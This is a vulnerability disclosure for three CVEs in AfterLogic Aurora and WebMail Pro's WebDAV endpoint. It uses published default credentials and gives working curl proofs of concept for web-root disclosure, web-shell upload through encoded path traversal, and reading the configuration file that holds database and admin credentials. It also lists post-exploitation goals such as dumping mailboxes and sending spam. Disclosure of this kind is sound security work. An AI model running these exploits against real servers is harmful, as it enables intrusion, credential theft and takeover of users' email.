CVE-2021-26292 - Public Full Path Disclosure on AfterLogic Aurora & WebMail Pro WebDAV EndPoint

The severity of the issue: Medium

Complexity: Easy

Affected Products: AfterLogic Aurora, AfterLogic WebMail PRO

Authentication: Not required

Attacks: Full Path Disclosure

Resources :

• https://owasp.org/www-community/attacks/Full_Path_Disclosure
• https://owasp.org/www-community/attacks/Path_Traversal

Authors :

• Emre KELEŞ - @emrekeles on twitter
• Emircan YILDIZ - @scorpsec on twitter
• Halil Emre ÖZEN - @halilemreozen on twitter

Report Summary :

AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP DELETE request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to obtain web root path.

To Reproduce :

Get the web root path with the following curl command

curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"

Response :

<?xml version="1.0" encoding="utf-8"?>
<d:error xmlns:d="DAV:" xmlns:s="http://sabredav.org/ns">
  <s:exception>Sabre\DAV\Exception\NotFound</s:exception>
  <s:message>File with name /var/www/html/www/webmailpro.dev/data/files/private/caldav_public_user@localhost/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 could not be located</s:message>
</d:error>

In this scenario : /var/www/html/www/webmailpro.dev is the web root path, this data is especially becomes valuable for the file upload vulnerabilities.

Technical Description:

• dav\server.php (handles the request, create the \afterlogic\DAV\Server instance )
• \libraries\Sabre\DAV\server.php -> exec (Pass the request method and uri to invokeMethod)
• \libraries\Sabre\DAV\server.php -> invokeMethod
• \libraries\Sabre\DAV\server.php -> httpDelete
• \libraries\Sabre\DAV\Tree.php -> delete
• \libraries\Sabre\DAV\ObjectTree.php -> getNodeForPath
• \libraries\Sabre\DAV\FS\Directory.php -> getChild

Get web root path vulnerability starts on step 7 / getChild, at the \Sabre\DAV\Exception\NotFound(‘File with name ’ . $path . ’ could not be located’) line $path variable contains web root path

With the above problem any loggable user can obtain web root path, with the caldav_public_user@localhost user, attackers don’t need any user info because it has a predefined password, so vulnerability becomes publicly accessible.

CVE-2021-26293 - RCE via Public unrestricted upload with path traversal on AfterLogic Aurora & WebMail Pro WebDAV EndPoint

Base Score: 9.8 CRITICAL

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Complexity: Easy

Affected Products: AfterLogic Aurora, AfterLogic WebMail PRO

Authentication: Not required

Attacks: Directory Traversal, Unrestricted Upload of File with Dangerous Type, Public Built-in Credentials For Critical Function

Gained Access: WebServer user ( Apache, Nginx, Etc… )

Resources:

• https://owasp.org/www-community/attacks/Full_Path_Disclosure
• https://owasp.org/www-community/attacks/Path_Traversal
• https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

Authors:

• Emre KELEŞ - @emrekeles on twitter
• Emircan YILDIZ - @scorpsec on twitter
• Halil Emre ÖZEN - @halilemreozen on twitter

Report Summary:

AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP PUT request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to create/overwrite files with malicious files such as web shells or database dumpers, etc.

After uploading a malicious PHP file to the web server, some example actions that the attacker can do;

1. Download / Modify the database
   1. Email addresses with easily decodable passwords
   2. CalDAV data ( Calendars of the users )
   3. CardDAV data ( Contacts of the users )
2. Download user uploaded private WebDAV files.
3. Intercept to read/modify emails of webmail users.
   1. A way to read emails because webmail servers usually are whitelisted on mail servers while normal clients have thresholds
   2. A good way to spread malicious executables/mails to users without struggling mail gateways/spam blockers.
   3. Acting like the real user and sending vicious emails to important users/companies
   4. Sending bulk emails for spam campaigns.
4. Try to privilege escalation to get the root/administrator server.

Etc…

To Reproduce:

Upload the malicious file with the following curl command

curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php"

As the AfterLogic WebMail Pro docs mentioned “the web root usually looks like /var/www/html” and at the above PoC assumes files are located under apache’s standard /var/www/html path, it may differ due to configuration but it’s not a block for the attacker because we realized that some of the EndPoints expose the document root path when the invalid path parameter requested.

Ways to figure out document root directory on customized web server configurations;

1. Using invalid path to get SabreDAV error which gives full path disclosure of the path to the webroot.

curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"

1. Trying to common web server paths
2. Brute force ( append new …/ to the URL, until getting HTTP 200 for the uploaded malicious file. )

Technical Description:

• dav\server.php (handles the request, create the \afterlogic\DAV\Server instance )
• \libraries\Sabre\DAV\server.php -> exec (Pass the request method and uri to invokeMethod)
• \libraries\Sabre\DAV\server.php -> invokeMethod
• \libraries\Sabre\DAV\server.php -> httpPut
• \libraries\Sabre\DAV\FS\File.php -> put

Unrestricted Upload of File with Dangerous Type, Directory Traversal problem starts on step 2 / exec, it doesn’t sanitize given parameters and checks the file extension which with that way attacker able to write upper directories and execute the malicious file

With the above problem any loggable user can uploads malicious files, with the caldav_public_user@localhost users, attackers don’t need any user info because it has a predefined password, so vulnerability becomes publicly accessible.

CVE-2021-26294 - Exposure of sensitive information to an unauthorized actor with path traversal on AfterLogic Aurora & WebMail Pro WebDAV EndPoint

Base Score: 7.5 HIGH

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Complexity: Easy

Affected Products: AfterLogic Aurora, AfterLogic WebMail PRO

Authentication: Not required

Attacks: Directory Traversal, Public Built-in Credentials For Critical Function

Resources :

https://owasp.org/www-community/attacks/Path_Traversal

Authors :

• Emre KELEŞ - @emrekeles on twitter
• Emircan YILDIZ - @scorpsec on twitter
• Halil Emre ÖZEN - @halilemreozen on twitter

Report Summary :

AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP GET request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to read all files under the web root.

To Reproduce :

Read any file with the following curl command

curl -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml"

The sample curl command will get the license key, database credentials, admin panel credentials, etc

Technical Description:

• dav\server.php (handles the request, create the \afterlogic\DAV\Server instance )
• \libraries\Sabre\DAV\server.php -> exec (Pass the request method and uri to * invokeMethod)
• \libraries\Sabre\DAV\server.php -> invokeMethod
• \libraries\Sabre\DAV\server.php -> httpGet

Directory Traversal problem starts on step 2 / exec, it doesn’t sanitize given parameters and checks the file extension when it’s combined the httpGet business login ( reading file content and returning ) the attacker able to read any file under the webroot.

With the above problem any loggable user can read configuration files, with the caldav_public_user@localhost users, attackers don’t need any user info because it has a predefined password, so vulnerability becomes publicly accessible.